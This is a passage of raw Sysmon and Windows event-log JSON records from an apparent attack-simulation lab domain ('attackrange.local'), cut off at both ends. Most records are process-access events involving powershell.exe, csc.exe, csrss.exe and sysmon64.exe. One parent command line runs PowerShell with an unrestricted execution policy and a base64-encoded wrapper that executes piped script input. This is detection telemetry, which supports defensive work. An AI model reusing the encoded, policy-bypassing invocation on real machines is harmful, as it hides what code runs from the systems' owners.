@\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\elpxvu02.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20BF-5F25-0000-001075D20600}","ParentProcessId":"4152","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4600,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nSourceProcessId: 4152\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-0010DEE30600}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1556B68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","SourceProcessId":"4152","SourceThreadId":"2008","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-0010DEE30600}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1556B68F)","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4601,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-0010DEE30600}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-0010DEE30600}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4602,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4603,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4604,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4605,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4606,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4607,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 